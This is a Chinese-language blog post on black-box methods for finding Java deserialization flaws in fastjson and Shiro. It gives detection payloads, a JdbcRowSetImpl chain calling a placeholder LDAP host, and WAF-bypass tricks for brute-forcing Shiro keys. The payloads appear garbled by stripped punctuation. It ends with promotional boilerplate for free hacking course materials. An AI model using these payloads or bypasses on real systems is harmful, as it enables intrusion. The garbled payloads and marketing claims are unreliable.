Java反序列化漏洞黑盒挖掘思路

📅 发布时间:2026/9/10 1:08:37
Java反序列化漏洞黑盒挖掘思路
Java反序列化漏洞黑盒挖掘思路-上篇java反序列化分为原生反序列化和组件反序列化组件反序列化有大家熟知的fastjson反序列化shiro反序列化漏洞等这篇文章分享一下自己的反序列化漏洞黑盒挖掘思路。以在实战中挖到的反序列化漏洞举例网站中反序列化漏洞数量大概为fastjsonshirojdbcXStream原生反序列化一、fastjson反序列化漏洞1.1判断链子fastjson反序列化漏洞主要看数据包是否以json传输如果是json传输就可以尝试打一下payload。可以先删除请求数据包的 } 查看报错报错如果是这样的基本就可以判断使用了fastjson组件直接盲打可以打这个payload如果存在fastjson1.2.24-1.2.83就会收到dnslog请求{zero:{type:java.net.Inet4Address,val:xxx}}判断fastjson版本{type:java.lang.AutoCloseablea[test:1]如果版本在1.2.47以下出网可以打这条通杀链子{v47:{type:java.lang.Class,val:com.sun.rowset.JdbcRowSetImpl},xxx:{type:com.sun.rowset.JdbcRowSetImpl,dataSourceName:ldap://0.0.0.0,autoCommit:true}}如果服务器不出网无法收到dnslog请求可以直接跑type的类查看报错回显长度判断是否使用了fastjson在之前写的文章也有提及如果存在这几个类可以直接打不出网利用链com.mchange.v2.c3p0.WrapperConnectionPoolDataSource这些链子可以用Java Chains工具生成。c3p0二次反序列化链,因为是fastjson反序列化漏洞那就肯定会有fastjson链。c3p0二次反序列化链二、shiro反序列化漏洞2.1waf绕过请求数据包中存在Cookie: rememberMe就可以尝试爆破一下密钥如果遇到waf可以尝试在remember添加脏数据绕过在remember插入$_-等符号不影响链子使用我写了一个脚本给remember添加脏数据绕过waf爆破密钥https://pan.baidu.com/s/1IqJdYSJpi1lpJxyeRFgkEw?pwdy7wd 提取码: y7wd也可以把数据包改成post添加脏数据绕过例如我这里添加了test参数塞入4mb脏数据2.2有key无链遇到有key无链的情况一般来说shiro基本会有cb链的因为shiro组件默认就会导入cb链的依赖如果代码存在一些过滤可以尝试打其他链子。也可以用刚才的Java Chains工具请求dnslog就可以判断有什么链子。之前写的文章也有提及。不出网可以通过延时来判断是否存在这条链子有key无链也可以尝试JRMP二次反序列化链。如果过滤器只是简单地检查序列化数据里有没有“java.lang.Runtime”或“ProcessBuilder”这种危险类名那么JRMP二次反序列化就能绕过。这里的复现图以原生反序列化举例像目前比较火热的开发岗位实属网络安全毕竟国家网络安全法也出台了网络安全等级保护2.0等合规要求也出来了。网络安全对于大部分政企单位来说已经从[可选项]变成了[必选项]。在以前很多政企单位在进行 IT 部门及岗位划分时只有研发和运维部门安全人员直接归属到基础运维部而现在越来越多单位为了满足国家安全法律法规的要求必须成立独立的网络安全部门拉拢各方安全人才、组建 SRC安全响应中心为自己的产品、应用、数据保卫护航。根据国家发布的《网络安全人才实战能力白皮书》数据显示目前中国网络安全人才供应严重匮乏每年高校安全专业培养人才仅有3万余人而网络安全岗位缺口在2027年将达327万缺口高达95%。了解网络安全首先要搞清楚下面这些前提网络安全到底包含哪些技术是否需要会编程网络安全行业有哪些职业方向“我”该如何选择网络安全的职业发展和成长路线是什么如果你是准备学习网络安全黑客或者正在学习下面这些你应该能用得上①网络安全学习路线②20份渗透测试电子书③安全攻防357页笔记④50份安全攻防面试指南⑤安全红队渗透工具包⑥网络安全必备书籍⑦100个漏洞实战案例⑧安全大厂内部视频资源⑨历年CTF夺旗赛题解析一、网络安全黑客学习路线网络安全黑客学习路线形成网络安全领域所有的知识点汇总它的用处就在于你可以按照上面的知识点去找对应的学习资源保证自己学得较为全面。二、网络安全教程视频我们在看视频学习的时候不能光动眼动脑不动手比较科学的学习方法是在理解之后运用它们这时候练手项目就很适合了。三、网络安全CTF实战案例光学理论是没用的要学会跟着一起敲要动手实操才能将自己的所学运用到实际当中去这里带来的是CTFSRC资料HW资料毕竟实战是检验真理的唯一标准嘛~四、网络安全面试题最后我们所有的作为都是为就业服务的所以关键的临门一脚就是咱们的面试题内容所以面试题板块是咱们不可或缺的部分这里我给大家准备的就是我在面试期间准备的资料。网安其实不难难的是坚持和相信自己我的经验是既然已经选定网安你就要相信它相信它能成为你日后进阶的高效渠道这样自己才会更有信念去学习才能在碰到困难的时候坚持下去。机会属于有准备的人这是一个实力的时代。人和人之间的差距不在于智商而在于如何利用业余时间只要你想学习什么时候开始都不晚不要担心这担心那你只需努力剩下的交给时间这份完整版的网络安全学习资料已经上传CSDN朋友们如果需要可以微信扫描下方CSDN官方认证二维码免费领取【保证100%免费】